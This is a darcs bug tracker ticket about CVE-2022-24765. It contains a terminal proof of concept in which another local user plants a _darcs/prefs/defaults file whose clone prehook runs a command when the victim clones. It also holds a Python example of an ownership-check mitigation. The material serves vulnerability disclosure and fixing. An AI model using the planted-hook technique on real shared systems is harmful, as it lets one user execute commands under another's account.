Issue 2690 CVE-2022-24765

Title: CVE-2022-24765
Priority:
Status: unknown
Milestone:
Resolved in:
Superseder:
Nosy List: gpiero
Assigned To:

Created on 2022-04-13.07:14:10 by gpiero, last changed 2022-04-13.22:20:50 by bf.

msg22979 Author: gpiero Date: 2022-04-13.07:14:09
darcs is (at least partially) vulnerable to this.

$ darcs --version
2.17.1 (+ 148 patches)
$ sudo useradd h4ck3r
$ whoami
$ mkdir -m 777 shared
$ darcs ini shared/R
WARNING: creating a nested repository.
Finished initializing repository.
$ sudo -u h4ck3r mkdir -p shared/_darcs/prefs
$ echo 'clone prehook touch /tmp/p4wn3d' | sudo -u h4ck3r tee shared/_darcs/prefs/defaults
clone prehook touch /tmp/p4wn3d
$ cd shared
shared $ ls /tmp/p4wn3d
ls: cannot access '/tmp/p4wn3d': No such file or directory
shared $ darcs clone R S
Prehook ran successfully.
WARNING: creating a nested repository.
Copying patches, to get lazy repository hit ctrl-C...
Finished cloning.
shared $ ls /tmp/p4wn3d

The prehook is (rightly) executed even if the command doesn't succeed.

shared $ darcs clone R not-existent/S
Prehook ran successfully.  <---
darcs: not-existent/S: createDirectory: does not exist (No such file or directory)

Anyway, at least in the case of `clone`, the attack only succeeds if the 
_darcs directory resides in the cwd.

shared $ cd ..
$ darcs clone shared/R shared/S
Directory or file named 'shared/S' already exists.

(no prehook run now).

Haven't investigated further combinations or commands (e.g. does `show 
repo` read the defaults file?)
msg22980 Author: gpiero Date: 2022-04-13.07:26:15
* [Wed, Apr 13, 2022 at 07:14:10AM +0000] Gian Piero Carrubba:
>(e.g. does `show repo` read the defaults file?)

Guess so:

$ darcs help show repo | grep -c hook
msg22988 Author: bf Date: 2022-04-13.22:20:50
Yes, every command reads the defaults file and can have hooks 
attached. How to fix this?

From https://github.blog/2022-04-12-git-security-vulnerability-announced/ :

"Git v2.35.2 [...] changes Git’s behavior when looking for a top-level .git directory to stop when its directory traversal changes ownership from the current user."

I guess we could do the same in darcs. Volunteers?
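The ownership-boundary rule bf quotes from the Git advisory, applied to the `_darcs` lookup, as an added example in Python (not darcs code, and not from this ticket; darcs itself is Haskell). It walks upward from the working directory looking for `_darcs` and gives up as soon as a directory on the path, or the `_darcs` directory it finds, belongs to someone other than the current user. Checking the `_darcs` directory itself matters for the session above, where `shared` belongs to the reporter but `shared/_darcs` was created by h4ck3r. The function names, the injectable `owner_of` hook and the simulated uids in the demo are choices made for this example; real ownership cannot be changed in a test without privileges.

```python
"""Added example (not darcs code): ownership boundary for repository discovery.

Models the mitigation quoted from the Git v2.35.2 advisory: while searching
upward for a repository directory, stop as soon as a directory is not owned by
the current user. Applied to darcs' _darcs/prefs/defaults lookup, a _darcs
planted by another user in a shared directory is never consulted, so hooks set
in its defaults file never run. Function names and the injectable `owner_of`
hook are choices made for this example.
"""
import os
from pathlib import Path
from typing import Callable, Optional

OwnerFn = Callable[[Path], int]


def _disk_owner(path: Path) -> int:
    """Default owner lookup: the uid recorded on disk for `path`."""
    return path.stat().st_uid


def _ancestors(start: Path) -> list:
    """The directory itself followed by each of its parents, outermost last."""
    here = start.resolve()
    return [here, *here.parents]


def find_repo_root_unchecked(start: Path, marker: str = "_darcs") -> Optional[Path]:
    """Behaviour reported in the ticket: the first directory on the walk that
    contains `marker` wins, no matter who owns it."""
    for candidate in _ancestors(start):
        if (candidate / marker).is_dir():
            return candidate
    return None


def find_repo_root(start: Path, marker: str = "_darcs",
                   owner_of: OwnerFn = _disk_owner,
                   current_uid: Optional[int] = None) -> Optional[Path]:
    """Hardened walk: abandon the search the moment a directory on the path,
    or the `marker` directory found inside it, belongs to another user.

    Both checks matter for the session in the ticket: `shared` is owned by the
    victim (they created it), while `shared/_darcs` is owned by h4ck3r.
    """
    uid = os.getuid() if current_uid is None else current_uid
    for candidate in _ancestors(start):
        if owner_of(candidate) != uid:
            return None          # crossed an ownership boundary: stop trusting
        repo_dir = candidate / marker
        if repo_dir.is_dir():
            if owner_of(repo_dir) != uid:
                return None      # marker planted by someone else: refuse it
            return candidate
    return None


def defaults_file(root: Optional[Path], marker: str = "_darcs") -> Optional[Path]:
    """prefs/defaults path that would be read for a discovered root, if any."""
    return None if root is None else root / marker / "prefs" / "defaults"


if __name__ == "__main__":
    # Constructed demo of the ticket's layout in a temporary directory.
    # Real uids cannot be changed without privileges, so ownership is simulated.
    import tempfile

    VICTIM, ATTACKER = 1000, 1001                       # simulated uids
    base = Path(tempfile.mkdtemp()).resolve()
    shared = base / "shared"
    (shared / "_darcs" / "prefs").mkdir(parents=True)   # planted by "h4ck3r"
    (shared / "R" / "_darcs").mkdir(parents=True)       # the victim's own repo
    simulated = {shared / "_darcs": ATTACKER}

    def owner_of(p: Path) -> int:
        return simulated.get(p.resolve(), VICTIM)

    print("unchecked, cwd=shared  :", find_repo_root_unchecked(shared))
    print("checked,   cwd=shared  :", find_repo_root(shared, owner_of=owner_of, current_uid=VICTIM))
    print("checked,   cwd=shared/R:", find_repo_root(shared / "R", owner_of=owner_of, current_uid=VICTIM))
```

With the real `_disk_owner` the same walk runs against actual uids; the unchecked variant returns `shared` from the ticket's layout, the checked one returns nothing for `shared` (so no defaults file is read) while still finding the user's own `shared/R`.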
Date                User    Action  Args
2022-04-13 07:14:10 gpiero  create
2022-04-13 07:26:15 gpiero  set     messages: + msg22980
2022-04-13 22:20:50 bf      set     messages: + msg22988